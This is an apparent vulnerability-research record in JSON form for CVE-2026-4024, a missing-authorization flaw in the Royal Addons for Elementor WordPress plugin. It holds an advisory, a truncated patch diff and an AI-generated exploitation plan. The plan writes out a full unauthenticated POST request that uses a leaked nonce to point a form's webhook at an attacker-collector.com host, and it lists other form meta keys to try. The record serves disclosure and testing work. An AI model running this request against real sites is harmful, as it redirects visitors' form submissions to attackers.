[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpI11HSahc3Kx1Jbmg-o67R0g6wV8BE-xROFjJRDyAFA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-4024","royal-addons-for-elementor-missing-authorization-to-unauthenticated-form-action-meta-modification","Royal Addons for Elementor \u003C= 1.7.1056 - Missing Authorization to Unauthenticated Form Action Meta Modification","The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `wpr_update_form_action_meta` AJAX action in all versions up to, and including, 1.7.1056. The handler is registered on both `wp_ajax` and `wp_ajax_nopriv` hooks, making it accessible to unauthenticated users. Although a nonce is verified, the nonce (`wpr-addons-js`) is publicly exposed in frontend JavaScript via `WprConfig.nonce` on any page that loads Royal Addons widgets, rendering the protection ineffective. The endpoint also lacks any capability or ownership checks and directly calls `update_post_meta()` with user-controlled input on a whitelisted set of form action meta keys. This makes it possible for unauthenticated attackers to modify form action configuration metadata (email, submissions, Mailchimp, and webhook settings) on any post, potentially leading to webhook\u002Femail action tampering and data exfiltration via modified webhook URLs.","royal-elementor-addons",null,"\u003C=1.7.1056","1.7.1057","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-01 20:11:49","2026-05-02 08:27:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2ecec7d7-d1b2-4ccf-ade6-1f78224968c6?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fplugin-options.php","admin\u002Ftemplates\u002Flibrary\u002Fwpr-templates-data.php","assets\u002Fcss\u002Fadmin\u002Feditor.min.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.min.css","assets\u002Fjs\u002Fadmin\u002Feditor.js","assets\u002Fjs\u002Fadmin\u002Feditor.min.js","assets\u002Fjs\u002Ffrontend.js","researched",false,3,"# Exploitation Research Plan - CVE-2026-4024\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (up to version 1.7.1056) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function `wpr_update_form_action_meta` is registered to both `wp_ajax` and `wp_ajax_nopriv` hooks, making it accessible to unauthenticated users. The function allows the modification of post metadata without verifying if the requesting user has the authority to edit the post or the settings. While it performs a nonce check (`wpr-addons-js`), this nonce is leaked on the frontend via the `WprConfig.nonce` JavaScript variable, rendering the protection ineffective.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `wpr_update_form_action_meta`\n- **HTTP Method:** `POST`\n- **Authentication:** Unauthenticated\n- **Required Parameters:**\n    - `action`: `wpr_update_form_action_meta`\n    - `nonce`: The value of `wpr-addons-js` (found in `WprConfig.nonce`)\n    - `post_id`: The ID of the post\u002Fpage to modify.\n    - `meta_key`: A whitelisted meta key (e.g., `wpr_form_webhook_url`, `wpr_form_email_to`) (inferred from description).\n    - `meta_value`: The new value for the meta key (e.g., an attacker-controlled webhook URL).\n\n## 3. Code Flow\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wpr_update_form_action_meta`.\n2. **Hook Execution:** WordPress triggers the handler registered to `wp_ajax_nopriv_wpr_update_form_action_meta`.\n3. **Nonce Verification:** The handler calls `check_ajax_referer('wpr-addons-js', 'nonce')` (inferred). Since the attacker provides the leaked nonce from the frontend, this check passes.\n4. **Authorization Check:** The handler **lacks** any call to `current_user_can()` or ownership checks.\n5. **Data Update:** The handler retrieves `post_id`, `meta_key`, and `meta_value` from the `$_POST` array.\n6. **Sink:** The handler calls `update_post_meta($post_id, $meta_key, $meta_value)` after verifying the `meta_key` against a whitelist of form settings.\n7. **Result:** Metadata associated with a Royal Addons form (like its webhook destination) is modified.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized for the plugin's frontend scripts. To obtain it:\n1. **Identify Script Loading:** The plugin enqueues `WprConfig` on pages that use Royal Addons widgets (like the Form Builder).\n2. **Create Trigger Content:** Use WP-CLI to create a page containing a Royal Addons form shortcode or widget.\n3. **Navigate and Extract:**\n    - Use `browser_navigate` to visit the created page.\n    - Use `browser_eval` to extract the nonce from the global `WprConfig` object.\n\n**Extraction JS:**\n```javascript\nwindow.WprConfig?.nonce\n```\n\n## 5. Exploitation Strategy\n### Step 1: Discover\u002FCreate Target\nFind an existing post ID or create a dummy page to prove the ability to modify meta.\n\n### Step 2: Get the Nonce\nNavigate to any frontend page where the plugin is active and extract `WprConfig.nonce`.\n\n### Step 3: Modify Form Settings\nSend a crafted AJAX request to redirect form submissions to an external listener.\n\n**Request Details:**\n- **URL:** `http:\u002F\u002F\u003Ctarget-site>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n```text\naction=wpr_update_form_action_meta&nonce=[EXTRACTED_NONCE]&post_id=[TARGET_ID]&meta_key=wpr_form_webhook_url&meta_value=https:\u002F\u002Fattacker-collector.com\u002Fleak\n```\n*(Note: Based on the description, `wpr_form_webhook_url` is a likely whitelisted key for the Form Action modification).*\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `royal-elementor-addons` v1.7.1056 is active.\n2. **Create Target Page:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Royal Form Page\" --post_status=publish --post_content='[wpr-form-builder]'\n   ```\n3. **Note the ID:** Capture the ID of the created post (e.g., `123`).\n\n## 7. Expected Results\n- The AJAX request should return a successful response (likely JSON `{\"success\": true}` or a string `1`).\n- The post meta for the target ID will be updated in the database.\n\n## 8. Verification Steps\nAfter performing the exploit, verify the database state using WP-CLI:\n```bash\nwp post meta get [TARGET_ID] wpr_form_webhook_url\n```\n**Success Condition:** The command returns `https:\u002F\u002Fattacker-collector.com\u002Fleak`.\n\n## 9. Alternative Approaches\nIf `wpr_form_webhook_url` is not the exact key name, the following keys (whitelisted for form actions) should be tried:\n- `wpr_form_email_to` (Modify where notification emails are sent)\n- `wpr_form_mailchimp_api_key` (Modify Mailchimp integration)\n- `_wpr_form_webhook_url` (Check for underscored prefix)\n\nIf the `WprConfig` object is not found on the homepage, check if it's nested under another object or examine the page source for:\n`wp_localize_script( ..., 'WprConfig', ... )` \nto confirm the localization handle.","The Royal Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wpr_update_form_action_meta' AJAX action. An unauthenticated attacker can modify form configuration metadata—such as webhook URLs and email recipients—by exploiting a publicly exposed nonce, potentially leading to the exfiltration of sensitive form submission data.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1056\u002Fadmin\u002Fplugin-options.php\t2026-04-03 11:57:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1057\u002Fadmin\u002Fplugin-options.php\t2026-04-10 10:58:42.000000000 +0000\n@@ -120,6 +120,8 @@\n     register_setting('wpr-extension-settings', 'wpr-parallax-multi-layer');\n     register_setting('wpr-extension-settings', 'wpr-custom-css');\n     register_setting('wpr-extension-settings', 'wpr-display-conditions');\n+    register_setting('wpr-extension-settings', 'wpr-equal-height');\n+    \u002F\u002F register_setting('wpr-extension-settings', 'wpr-column-slider');\n     register_setting('wpr-extension-settings', 'wpr-sticky-section');\n \n     \u002F\u002F Element Toggle\n@@ -1630,6 +1632,12 @@\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n                     } elseif ( 'wpr-display-conditions' === $option_name ) {\n                         echo '\u003Cbr>\u003Cspan>Tip: Edit any Element > Navigate to Visibility tab\u003C\u002Fspan>';\n+                    } elseif ( 'wpr-column-slider' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n+                    } elseif ( 'wpr-equal-height' === $option_name ) {\n+                        echo '\u003Cbr>\u003Cspan>Tip: Edit any Section > Navigate to Advanced tab\u003C\u002Fspan>';\n+                        \u002F\u002F echo '\u003Ca href=\"https:\u002F\u002Fwww.youtube.com\" target=\"_blank\">Watch Video Tutorial\u003C\u002Fa>';\n                     }\n ... (truncated)","1. Nonce Retrieval: Navigate to any frontend page where Royal Addons widgets are loaded and extract the 'wpr-addons-js' nonce from the global 'WprConfig.nonce' JavaScript variable.\n2. Target Identification: Identify the 'post_id' of a post or page containing a Royal Addons form.\n3. Unauthorized Modification: Send an unauthenticated AJAX POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action 'wpr_update_form_action_meta'.\n4. Payload: Include the extracted nonce, the target 'post_id', a whitelisted 'meta_key' (such as 'wpr_form_webhook_url'), and a malicious 'meta_value' (e.g., an attacker-controlled listener URL).\n5. Verification: Upon success, subsequent form submissions from that post will be directed to the attacker's controlled endpoint, allowing for data interception.","gemini-3-flash-preview","2026-05-04 17:08:09","2026-05-04 17:08:29",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.7.1056","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1056","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1056.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1057","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1057.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]